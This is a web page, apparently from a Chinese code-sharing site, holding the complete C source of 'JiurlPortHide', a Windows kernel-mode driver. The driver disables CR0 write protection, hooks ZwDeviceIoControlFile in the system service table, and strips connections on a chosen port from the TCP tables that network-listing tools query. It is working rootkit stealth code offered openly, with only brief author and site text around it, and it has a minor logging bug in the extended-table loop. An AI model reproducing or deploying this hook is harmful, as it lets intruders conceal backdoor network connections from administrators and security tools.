📄 jiurlporthidehook.htm
字号:
// jiurl // from tcpioctl.h tdiinfo.h tdistat.h<br>
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003<br>
<br>
//* Structure of an entity ID.<br>
typedef struct TDIEntityID {<br>
ULONG tei_entity;<br>
ULONG tei_instance;<br>
} TDIEntityID;<br>
<br>
//* Structure of an object ID.<br>
typedef struct TDIObjectID {<br>
TDIEntityID toi_entity;<br>
ULONG toi_class;<br>
ULONG toi_type;<br>
ULONG toi_id;<br>
} TDIObjectID;<br>
<br>
#define CONTEXT_SIZE 16<br>
//<br>
// QueryInformationEx IOCTL. The return buffer is passed as the OutputBuffer<br>
// in the DeviceIoControl request. This structure is passed as the<br>
// InputBuffer.<br>
//<br>
struct tcp_request_query_information_ex {<br>
TDIObjectID ID; // object ID to query.<br>
ULONG_PTR Context[CONTEXT_SIZE/sizeof(ULONG_PTR)]; // multi-request context.
Zeroed<br>
// for the first request.<br>
};<br>
<br>
typedef struct tcp_request_query_information_ex<br>
TCP_REQUEST_QUERY_INFORMATION_EX,<br>
*PTCP_REQUEST_QUERY_INFORMATION_EX;<br>
<br>
#define CO_TL_ENTITY 0x400<br>
#define INFO_CLASS_PROTOCOL 0x200<br>
#define INFO_TYPE_PROVIDER 0x100<br>
</span><p>#if 0
//================================================================<br>
Copyright (c) JIURL, All Rights Reserved<br>
========================================================================<br>
<br>
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/<br>
<br>
Module Name:<br>
<br>
JiurlPortHide.cpp<br>
<br>
About:<br>
<br>
- 这个驱动项目由一个我写的 AppWizard 创建。<br>
<br>
[ HomePage ] http://jiurl.yeah.net<br>
~~~~~~~~~~~~~~~~~~~~~<br>
[ Email ] jiurl@mail.china.com<br>
~~~~~~~~~~~~~~~~~~~~<br>
[ Forum ] http://jiurl.cosoft.org.cn/forum/index.php<br>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
<br>
- 有偿定制 AppWizard ,请发邮件联系 。<br>
<br>
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/<br>
#endif<br>
<br>
<br>
#ifdef __cplusplus<br>
extern "C"<br>
{<br>
#endif<br>
<br>
#include <ntddk.h><br>
<br>
#include "JiurlPortHide.h"<br>
#include "Jiurl_tcpioctl.h"<br>
<br>
#ifdef __cplusplus<br>
}<br>
#endif<br>
<br>
NTSTATUS <br>
DriverEntry(IN PDRIVER_OBJECT DriverObject,<br>
IN PUNICODE_STRING RegistryPath)<br>
{<br>
DbgPrint("JiurlPortHide: Hello,This is DriverEntry!\n");<br>
<br>
DriverObject->MajorFunction[IRP_MJ_CREATE] = <br>
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispatch; <br>
DriverObject->DriverUnload = DriverUnload; <br>
<br>
// save old system call locations<br>
OldZwDeviceIoControlFile = (ZWDEVICEIOCONTROLFILE)(KeServiceDescriptorTable.ServiceTableBase[
*(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)]);<br>
<br>
_asm<br>
{<br>
CLI //dissable interrupt<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
AND EAX, NOT 10000H //disable WP bit <br>
MOV CR0, EAX //write register back<br>
}<br>
<br>
(KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)])
= (ULONG)NewZwDeviceIoControlFile;<br>
<br>
_asm <br>
{<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
OR EAX, 10000H //enable WP bit <br>
MOV CR0, EAX //write register back <br>
STI //enable interrupt<br>
}<br>
<br>
return STATUS_SUCCESS;<br>
}<br>
<br>
NTSTATUS<br>
DriverDispatch(<br>
IN PDEVICE_OBJECT DeviceObject,<br>
IN PIRP Irp<br>
)<br>
{<br>
Irp->IoStatus.Status = STATUS_SUCCESS;<br>
IoCompleteRequest (Irp,IO_NO_INCREMENT);<br>
return Irp->IoStatus.Status;<br>
}<br>
<br>
void DriverUnload(IN PDRIVER_OBJECT DriverObject)<br>
{<br>
DbgPrint("JiurlPortHide: Bye,This is DriverUnload!\n");<br>
<br>
_asm<br>
{<br>
CLI //dissable interrupt<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
AND EAX, NOT 10000H //disable WP bit <br>
MOV CR0, EAX //write register back<br>
}<br>
<br>
(KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)])
= (ULONG)OldZwDeviceIoControlFile;<br>
<br>
_asm <br>
{<br>
MOV EAX, CR0 //move CR0 register into EAX<br>
OR EAX, 10000H //enable WP bit <br>
MOV CR0, EAX //write register back <br>
STI //enable interrupt<br>
}<br>
}<br>
<br>
NTSTATUS NewZwDeviceIoControlFile(<br>
IN HANDLE FileHandle,<br>
IN HANDLE Event OPTIONAL,<br>
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,<br>
IN PVOID ApcContext OPTIONAL,<br>
OUT PIO_STATUS_BLOCK IoStatusBlock,<br>
IN ULONG IoControlCode,<br>
IN PVOID InputBuffer OPTIONAL,<br>
IN ULONG InputBufferLength,<br>
OUT PVOID OutputBuffer OPTIONAL,<br>
IN ULONG OutputBufferLength<br>
)<br>
{<br>
NTSTATUS rc;<br>
<br>
rc = ((ZWDEVICEIOCONTROLFILE)(OldZwDeviceIoControlFile)) (<br>
FileHandle,<br>
Event,<br>
ApcRoutine,<br>
ApcContext,<br>
IoStatusBlock,<br>
IoControlCode,<br>
InputBuffer,<br>
InputBufferLength,<br>
OutputBuffer,<br>
OutputBufferLength<br>
);<br>
<br>
if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX)<br>
{<br>
return(rc); <br>
}<br>
<br>
TCP_REQUEST_QUERY_INFORMATION_EX req;<br>
TCPAddrEntry* TcpTable;<br>
TCPAddrExEntry* TcpExTable;<br>
ULONG numconn;<br>
LONG i;<br>
<br>
DbgPrint("JiurlPortHide: IOCTL_TCP_QUERY_INFORMATION_EX\n");<br>
<br>
if( NT_SUCCESS( rc ) ) <br>
{<br>
req.ID.toi_entity.tei_entity = CO_TL_ENTITY;<br>
req.ID.toi_entity.tei_instance = 0;<br>
req.ID.toi_class = INFO_CLASS_PROTOCOL;<br>
req.ID.toi_type = INFO_TYPE_PROVIDER;<br>
req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID;<br>
<br>
if( !memcmp( InputBuffer, &req, sizeof(TDIObjectID) ) )<br>
{<br>
numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry);<br>
TcpTable = (TCPAddrEntry*)OutputBuffer;<br>
<br>
for( i=0; i<numconn; i++ )<br>
{<br>
if( ntohs(TcpTable[i].tae_ConnLocalPort) == PORTHIDE )<br>
{<br>
DbgPrint("JiurlPortHide: HidePort %d\n", ntohs(TcpTable[i].tae_ConnLocalPort));<br>
<br>
memcpy( (TcpTable+i), (TcpTable+i+1), ((numconn-i-1)*sizeof(TCPAddrEntry))
);<br>
numconn--;<br>
i--;<br>
}<br>
}<br>
<br>
IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry);<br>
return(rc);<br>
}<br>
<br>
<br>
req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID;<br>
<br>
if( !memcmp( InputBuffer, &req, sizeof(TDIObjectID) ) )<br>
{<br>
numconn = IoStatusBlock->Information/sizeof(TCPAddrExEntry);<br>
TcpExTable = (TCPAddrExEntry*)OutputBuffer;<br>
<br>
for( i=0; i<numconn; i++ )<br>
{<br>
if( ntohs(TcpExTable[i].tae_ConnLocalPort) == PORTHIDE )<br>
{<br>
DbgPrint("JiurlPortHide: HidePort %d\n",ntohs(TcpTable[i].tae_ConnLocalPort));<br>
<br>
memcpy( (TcpExTable+i), (TcpExTable+i+1), ((numconn-i-1)*sizeof(TCPAddrExEntry))
);<br>
numconn--;<br>
i--;<br>
}<br>
}<br>
<br>
IoStatusBlock->Information = numconn*sizeof(TCPAddrExEntry);<br>
return(rc);<br>
}<br>
}<br>
<br>
return(rc);<br>
}<br>
<p> 下载源码及示例程序<p>
<br>
<b>完</b><br>
<br>
欢迎交流,欢迎交朋友,<br>
欢迎访问<br>
主页 <a href="http://jiurl.yeah.net" target="_blank">http://jiurl.yeah.net</a>
<a href="http://jiurl.nease.net/" target="_blank">http://jiurl.nease.net</a>
论坛 <a href="http://jiurl.cosoft.org.cn/forum" target="_blank">http://jiurl.cosoft.org.cn/forum</a>
<p>f啊k,不带你们这样的啊,有好事不叫我。<p>
<p>
</td>
</tr>
</table>
</div>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -